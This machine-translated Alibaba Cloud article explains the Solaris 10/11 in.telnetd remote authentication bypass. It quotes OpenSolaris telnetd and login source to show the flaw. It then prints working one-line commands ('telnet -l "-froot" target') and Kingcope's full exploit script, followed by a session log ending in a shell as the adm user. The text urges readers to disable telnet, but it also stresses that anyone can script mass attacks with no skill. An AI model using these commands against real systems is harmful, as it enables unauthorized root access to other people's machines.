Home > Others

Use of Telnet in Solaris

Source: Internet
Author: User
Tags telnet program
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

For the use of the telnet service, we will mainly explain some applications in the Solaris system. First, let's take a look at the relevant content of the Solaris System and the telnet function. If your Solaris system runs the telnet service program, you will be surprised: you only need to perform a simple step to get the root permission (or other user permissions ). the vulnerability is the telnet Remote root Vulnerability (or SunOS 10/11/5.10 in) on the Solaris 5.11 system. telnetd remote vulnerability ). you can execute large-scale attacks using scripts without any skills or vulnerability knowledge. the complete vulnerability exploitation method can be obtained from this pdf article (or from the vulnerability code explanation section below ). the following describes how to exploit this vulnerability. basically, you can specify any "-fusername" parameter after the-l option of the telnet command. fusername can be any user name you need, such as bin and root. after telnet, you can get the user permission specified by fusername. for example:

Telnet-l "-fbin" target_address

We recommend that you disable the telnet program on the solaris system. In addition, you can download the EV data with this vulnerability from the ErraSec website.

Note: The default installation of Solaris 10 will not be affected by this vulnerability. if you modify the CONSOLE variable in the/etc/default/login configuration file, you can only log on to the system through the local CONSOLE root. of course, if you comment out the CONSOLE line, any user can exploit the telnet Vulnerability locally or remotely.

Telnet-l "-froot" target_address

Vulnerability code explanation

The following vulnerability Code applies to the in. telnetd program on the SunOS 5.10/5.11 system. The original author is Kingsley.

First, check the source code of Opensolaris:

 
 
    
  
  
  1. CODE:  
    2. 
  
  
  2. /usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c  
    3. 
  
  
  3. 3198  
    4. 
  
  
  4. 3199 } else /* default, no auth. info available, login does it all */ {  
    5. 
  
  
  5. 3200 (void) execl(LOGIN_PROGRAM, "login",  
    6. 
  
  
  6. 3201 "-p", "-h", host, "-d", slavename,  
    7. 
  
  
  7. 3202 getenv("USER"), 0);  
    8. 
  
  
  8. 3203 }  
    9. 
  
  
  9. /usr/src/cmd/login/login.c  
    10. 
  
  
  10. 1397 break;  
    11. 
  
  
  11. 1398  
    12. 
  
  
  12. 1399 case 'f':  
    13. 
  
  
  13. 1400 /*  
    14. 
  
  
  14. 1401 * Must be root to bypass authentication  
    15. 
  
  
  15. 1402 * otherwise we exit() as punishment for trying.  
    16. 
  
  
  16. 1403 */  
    17. 
  
  
  17. 1404 if (getuid() != 0 || geteuid() != 0) {  
    18. 
  
  
  18. 1405 audit_error = ADT_FAIL_VALUE_AUTH_BYPASS;  
    19. 
  
  
  19. 1406  
    20. 
  
  
  20. 1407 login_exit(1); /* sigh */  
    21. 
  
  
  21. 1408 /*NOTREACHED*/  
    22. 
  
  
  22. 1409 }  
    23. 
  
  
  23. 1410 /* save fflag user name for future use */  
    24. 
  
  
  24. 1411 SCPYL(user_name, optarg);  
    25. 
  
  
  25. 1412 fflag = B_TRUE; 
    26.

After reading the above, we can set the USER environment variable "-fusername" to obtain the required USER permissions. New users do not need password verification for login.

The following is the official vulnerability exploitation code (called sunos ):

--- Start ---

 
 
    
  
  
  1. #!/bin/sh  
    2. 
  
  
  2. # CLASSIFIED CONFIDENTIAL SOURCE MATERIAL  
    3. 
  
  
  3. #  
    4. 
  
  
  4. # *********************ATTENTION********************************  
    5. 
  
  
  5. # THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES  
    6. 
  
  
  6. # (C) COPYRIGHT Kingcope, 2007  
    7. 
  
  
  7. #  
    8. 
  
  
  8. ################################################################  
    9. 
  
  
  9. echo ""  
    10. 
  
  
  10. echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"  
    11. 
  
  
  11. if [ $# -ne 2 ]; then  
    12. 
  
  
  12. echo "./sunos "  
    13. 
  
  
  13. echo "./sunos localhost bin"  
    14. 
  
  
  14. exit  
    15. 
  
  
  15. fi  
    16. 
  
  
  16. echo ""  
    17. 
  
  
  17. echo "ALEX ALEX"  
    18. 
  
  
  18. echo ""  
    19. 
  
  
  19. telnet -l"-f$2" $1 
    20.

--- End ---

Then execute the vulnerability program:

 
 
    
  
  
  1. $ ./sunos adm  
    2. 
  
  
  2. SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net  
    3. 
  
  
  3. ALEX ALEX  
    4. 
  
  
  4. Trying .  
    5. 
  
  
  5. Connected to .  
    6. 
  
  
  6. Escape character is '^]'.  
    7. 
  
  
  7. Last login: Wed Feb 7 16:28:19 from  
    8. 
  
  
  8. Sun Microsystems Inc. SunOS 5.10 Generic January 2005  
    9. 
  
  
  9. $ uname -a;id  
    10. 
  
  
  10. SunOS library7 5.10 Generic_118833-33 sun4u sparc SUNW,Sun-Fire-V245  
    11. 
  
  
  11. uid=4(adm) gid=4(adm)  
    12. 
  
  
    13.

We can see that after the sunos script is executed, the executor obtains the adm account permission.

Reference

Trivial remote Solaris 0day, disable telnet now.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
use of telnet command what is use of telnet command how to use telnet in command prompt how to use telnet in windows xp how to use telnet in windows how to use telnet command in linux how to use telnet command in windows

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More